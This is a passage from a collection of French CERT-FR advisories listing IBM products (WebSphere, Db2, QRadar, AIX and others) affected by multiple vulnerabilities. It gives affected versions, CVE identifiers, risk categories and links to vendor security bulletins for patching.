"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition version 5.1 sans les correctifs de s\u00e9curit\u00e9 APAR PH67137, APAR PH67132,",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse on Cloud Pak for Data versions ant\u00e9rieures \u00e0 v5.2.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-31129",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31129"
},
{
"name": "CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"name": "CVE-2023-43642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43642"
},
{
"name": "CVE-2025-0755",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0755"
},
{
"name": "CVE-2025-25724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-51473",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51473"
},
{
"name": "CVE-2015-5237",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-5237"
},
{
"name": "CVE-2025-3445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3445"
},
{
"name": "CVE-2025-32386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32386"
},
{
"name": "CVE-2025-46762",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46762"
},
{
"name": "CVE-2025-32421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
},
{
"name": "CVE-2016-4055",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4055"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2024-45492",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45492"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2025-30472",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30472"
},
{
"name": "CVE-2025-24528",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24528"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2022-36364",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36364"
},
{
"name": "CVE-2023-5868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5868"
},
{
"name": "CVE-2025-48050",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48050"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2025-33092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33092"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2025-1647",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1647"
},
{
"name": "CVE-2023-39417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39417"
},
{
"name": "CVE-2023-34462",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34462"
},
{
"name": "CVE-2024-0406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0406"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2025-33143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33143"
},
{
"name": "CVE-2021-3393",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3393"
},
{
"name": "CVE-2025-2533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2533"
},
{
"name": "CVE-2019-10202",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10202"
},
{
"name": "CVE-2023-5870",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5870"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2025-36097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36097"
},
{
"name": "CVE-2024-45490",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45490"
},
{
"name": "CVE-2025-36010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36010"
},
{
"name": "CVE-2025-36047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36047"
},
{
"name": "CVE-2024-45491",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45491"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2022-49846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49846"
},
{
"name": "CVE-2025-32462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32462"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2023-5869",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5869"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-48068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
},
{
"name": "CVE-2024-48949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48949"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2025-33114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33114"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2022-41862",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41862"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2025-21966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21966"
},
{
"name": "CVE-2023-22467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22467"
},
{
"name": "CVE-2022-24823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24823"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2019-9193",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9193"
},
{
"name": "CVE-2018-5968",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5968"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2025-37799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37799"
},
{
"name": "CVE-2022-24785",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24785"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2023-26133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26133"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2023-2454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2454"
},
{
"name": "CVE-2024-9823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9823"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-56339",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56339"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2022-1552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1552"
},
{
"name": "CVE-2024-49828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49828"
},
{
"name": "CVE-2024-55549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2025-32387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32387"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2017-18214",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18214"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-2455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2455"
},
{
"name": "CVE-2025-24855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24855"
},
{
"name": "CVE-2025-5702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5702"
},
{
"name": "CVE-2025-36071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36071"
},
{
"name": "CVE-2025-37749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37749"
},
{
"name": "CVE-2024-0985",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0985"
},
{
"name": "CVE-2017-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15095"
},
{
"name": "CVE-2024-36114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36114"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2019-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12086"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2023-52933",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52933"
},
{
"name": "CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"name": "CVE-2024-12243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
},
{
"name": "CVE-2022-2625",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2625"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2017-17485",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-17485"
},
{
"name": "CVE-2024-6762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6762"
},
{
"name": "CVE-2022-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1471"
},
{
"name": "CVE-2024-52894",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52894"
},
{
"name": "CVE-2025-21759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21759"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2025-21887",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21887"
},
{
"name": "CVE-2025-6442",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6442"
},
{
"name": "CVE-2024-12133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
},
{
"name": "CVE-2024-51504",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51504"
},
{
"name": "CVE-2022-41881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41881"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-21756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21756"
},
{
"name": "CVE-2018-1000873",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000873"
},
{
"name": "CVE-2023-32305",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32305"
},
{
"name": "CVE-2025-47287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47287"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
},
{
"name": "CVE-2025-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3576"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
}
],
"initial_release_date": "2025-09-05T00:00:00",
"last_revision_date": "2025-09-05T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0760",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-09-05T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243927",
"url": "https://www.ibm.com/support/pages/node/7243927"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243923",
"url": "https://www.ibm.com/support/pages/node/7243923"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243924",
"url": "https://www.ibm.com/support/pages/node/7243924"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244012",
"url": "https://www.ibm.com/support/pages/node/7244012"
},
{
"published_at": "2025-09-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243659",
"url": "https://www.ibm.com/support/pages/node/7243659"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244002",
"url": "https://www.ibm.com/support/pages/node/7244002"
},
{
"published_at": "2025-08-29",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243582",
"url": "https://www.ibm.com/support/pages/node/7243582"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243928",
"url": "https://www.ibm.com/support/pages/node/7243928"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243925",
"url": "https://www.ibm.com/support/pages/node/7243925"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244010",
"url": "https://www.ibm.com/support/pages/node/7244010"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243922",
"url": "https://www.ibm.com/support/pages/node/7243922"
},
{
"published_at": "2025-09-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243673",
"url": "https://www.ibm.com/support/pages/node/7243673"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243877",
"url": "https://www.ibm.com/support/pages/node/7243877"
}
]
}
CERTFR-2025-AVI-0546
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | WebSphere | WebSphere Application Server versions 8.5.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository sans les derniers correctifs de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web services versions 6.4.x antérieures à 6.4.0.3 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.0.x sans les derniers correctifs de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web services versions 6.3.x antérieures à 6.3.0.14 | ||
| IBM | Spectrum | Spectrum Protect Plus versions 10.1.x antérieures à 10.1.17.1 | ||
| IBM | QRadar | QRadar Hub versions antérieures à 3.8.3 | ||
| IBM | AIX | AIX versions 7.3.x sans les derniers correctif de sécurité | ||
| IBM | Db2 | DB2 Data Management Console pour CPD versions antérieures à 4.8.7 | ||
| IBM | QRadar Deployment Intelligence App | QRadar Deployment Intelligence App versions antérieures à 3.0.17 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "WebSphere Application Server versions 8.5.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web services versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.3",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.0.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.14",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Spectrum Protect Plus versions 10.1.x ant\u00e9rieures \u00e0 10.1.17.1",
"product": {
"name": "Spectrum",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Hub versions ant\u00e9rieures \u00e0 3.8.3",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX versions 7.3.x sans les derniers correctif de s\u00e9curit\u00e9",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console pour CPD versions ant\u00e9rieures \u00e0 4.8.7",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Deployment Intelligence App versions ant\u00e9rieures \u00e0 3.0.17",
"product": {
"name": "QRadar Deployment Intelligence App",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-25577",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25577"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2023-23934",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23934"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2020-29651",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29651"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-8305",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8305"
},
{
"name": "CVE-2023-1409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1409"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2024-7553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7553"
},
{
"name": "CVE-2024-36124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36124"
},
{
"name": "CVE-2024-56406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2024-8207",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8207"
},
{
"name": "CVE-2024-3372",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3372"
},
{
"name": "CVE-2025-33214",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33214"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2023-46136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46136"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2019-20916",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20916"
},
{
"name": "CVE-2020-7789",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-7789"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2025-41232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41232"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-1077",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1077"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2022-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42969"
},
{
"name": "CVE-2023-30861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30861"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2024-56334",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56334"
},
{
"name": "CVE-2020-28493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28493"
},
{
"name": "CVE-2024-6375",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6375"
},
{
"name": "CVE-2025-36038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36038"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
}
],
"initial_release_date": "2025-06-27T00:00:00",
"last_revision_date": "2025-06-27T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0546",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-27T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238297",
"url": "https://www.ibm.com/support/pages/node/7238297"
},
{
"published_at": "2025-06-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7237702",
"url": "https://www.ibm.com/support/pages/node/7237702"
},
{
"published_at": "2025-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7237967",
"url": "https://www.ibm.com/support/pages/node/7237967"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238168",
"url": "https://www.ibm.com/support/pages/node/7238168"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238156",
"url": "https://www.ibm.com/support/pages/node/7238156"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238155",
"url": "https://www.ibm.com/support/pages/node/7238155"
},
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238295",
"url": "https://www.ibm.com/support/pages/node/7238295"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238159",
"url": "https://www.ibm.com/support/pages/node/7238159"
}
]
}
CERTFR-2025-AVI-0452
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Security QRadar EDR | Security QRadar EDR versions 3.12.x antérieures à 3.12.17 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository versions 8.5.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere | WebSphere Application Server versions 8.5.x sans le correctif PH66499 ou antérieures à 8.5.5.28 (correctif prévu au troisième trimestre 2025) |
References
| Title | Publication Time | Tags | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Security QRadar EDR versions 3.12.x ant\u00e9rieures \u00e0 3.12.17",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository versions 8.5.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 8.5.x sans le correctif PH66499 ou ant\u00e9rieures \u00e0 8.5.5.28 (correctif pr\u00e9vu au troisi\u00e8me trimestre 2025)",
"product": {
"name": "WebSphere",
"vendor": {
